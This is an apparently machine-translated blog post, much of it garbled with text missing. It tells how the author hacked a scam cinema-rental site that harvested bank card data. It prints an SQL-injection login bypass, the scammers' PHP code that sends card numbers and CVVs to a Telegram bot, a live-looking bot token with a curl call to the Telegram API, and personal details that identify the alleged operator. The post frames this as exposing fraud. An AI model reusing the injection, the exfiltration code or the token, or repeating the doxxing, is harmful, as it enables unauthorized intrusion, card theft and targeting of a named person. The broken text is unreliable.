Anotação
Cada um de nós pode se tornar vítima de um atacante, mas às vezes predadores e presas mudam de lugar.
Esta é uma pequena história sobre como o uso inepto da tecnologia pode levar à divulgação da personalidade. O artigo será útil tanto para jovens hackers que desejam obter "dinheiro fácil" quanto para aqueles que querem pegá-los.
1. Introdução
Em uma noite de fevereiro, eu estava ocupada procurando um lugar para um encontro romântico com meu amante. Depois de algum tempo, minha atenção foi atraída para o site
milleniumfilm.ru , que atualmente não está disponível. O site forneceu serviços de aluguel para pequenas salas de cinema para visualização privada. Belas fotos, preços razoáveis, há suporte on-line, mas uma coisa: foi proposto inserir dados do cartão bancário em uma página desprotegida do mesmo domínio. Cauteloso, escrevi para o suporte técnico do site e os golpistas não demoraram muito a esperar - percebendo que eu era tecnicamente competente o suficiente para me enviarem três cartas. É claro que os golpistas não fazem sentido perder tempo comigo, mas por que tão rudes? - Em qualquer situação, você precisa permanecer um homem.
Você pode encontrar resenhas sobre sites do mesmo plano aqui:
zhaloba-online.ru . Alguns deles ainda funcionam.
Hacking
Sentindo injustiça universal, a fim de estabelecer a identidade do atacante e suprimir suas atividades, comecei a estudar o site em busca de vulnerabilidades.
Apontando com um dedo para o céu, o primeiro endereço que inseri me levou ao
painel de administração , que educadamente me pediu para indicar "Login" e "Senha".
A primeira tentativa de injeção de SQL A primeira senha que veio à mente
1' or '1
.
., .
Gelloiss.ru . « » — : , , , cvc2 .
., 3D-secure, . , . , 3D-secure . , , .
« » - . , php-shell.
/images/,
login.php. , .
telegram.php.
.$ cat telegram.php
<?
function send_mess($text) {
$token = "626852480:AAFdn7L61QCMZEAVW7dsdnRGiLINp6d_pgs";
$mess = $text;
$chat = "-302359340";
/*return "<iframe style='width:500px; height:500px;' src='https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chat."&parse_mode=html&text=".$mess."'></iframe>";*/
file_get_contents("https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chat."&parse_mode=html&text=".$mess);
}
PHP - send_mess. , - , .
grep./cart.php:22:send_mess(" : ".$name."%0D%0AEmail: ".$email."%0D%0A: ".$phone."%0D%0A : ".$date."%0D%0A".": ".$time."%0D%0A: ".$city."%0D%0A: ".$sum."%0D%0A : ".$services."%0D%0AIP: ".$ip."%0D%0A: ".$link_ban_ip);
./pay/ms.php:21: send_mess(": ".$sum."%0D%0A : ".$name."%0D%0A : ".$num."%0D%0A , : ".$month."%0D%0A: ".$year."%0D%0Acvv: ".$cvv);
, -, chat_id, skype «ura7887» telegram «Gelloiss» ( telegram , telegram-
).
, , .
curl$ curl "https://api.telegram.org/bot626852480:AAFdn7L61QCMZEAVW7dsdnRGiLINp6d_pgs/getChatAdministrators?chat_id=-302359340"
{"ok":true,"result":[{"user":{"id":365019332,"is_bot":false,"first_name":"Iskr\u00e1","username":"Gelloiss","language_code":"ru"},"status":"creator"}]}
username — «gelloiss».
: ! : «gelloiss», «ura7887»,
, «Gelloiss.ru», skype «ura7887».
:
vk.com , 6 , 14 .
anime.anidub.com.
blackhacker.ru, .
telegram
,
Gelloiss.ru telegram, telegram- . , telegram- .
shell$ sha256sum <<< "i'm carder yuri iskra."
a4e0bb4a6d6a214cadd6f6fa96d91c1401d50f01a5cc157b2f56079400e24af8 -
telegram :
a4e0bb4a6d6a214cadd6f6fa96d91c1401d50f01a5cc157b2f56079400e24af8 .
, . , 100 , +100.
, «». « »
.
, . : 3 - 13 . , - , 2 . , , . ,
moneyonline.world.
Update 2019-04-21:
gelloiss , , , telegram:
Message(id=31, grouped_id=None, from_id=898775249, edit_date=None, message=' « » ', to_id=PeerUser(user_id=365019332), entities=[], fwd_from=None, views=None, media=None, post=False, media_unread=False, out=True, date=datetime.datetime(2019, 4, 19, 9, 36, 15, tzinfo=datetime.timezone.utc), silent=False, via_bot_id=None, post_author=None, reply_to_msg_id=None, from_scheduled=False, mentioned=False, reply_markup=None),
Message(id=33, grouped_id=None, from_id=365019332, edit_date=None, message='moneyonline.world/pay/?pay=123\n ?)) \n ', to_id=PeerUser(user_id=898775249), entities=[MessageEntityUrl(offset=0, length=38)], fwd_from=None, views=None, media=MessageMediaWebPage(webpage=WebPage(id=8004451420650727228, hash=0, photo=None, description='MoneyOnline.com ‒ , . , , . , .', embed_height=None, embed_width=None, document=None, embed_type=None, site_name='MoneyOnline', cached_page=None, url='https://moneyonline.world/pay/?pay=123', display_url='moneyonline.world/ru', duration=None, author=None, embed_url=None, title='MoneyOnline | , , ', type='article')), post=False, media_unread=False, out=False, date=datetime.datetime(2019, 4, 19, 9, 37, 53, tzinfo=datetime.timezone.utc), silent=False, via_bot_id=None, post_author=None, reply_to_msg_id=None, from_scheduled=False, mentioned=False, reply_markup=None),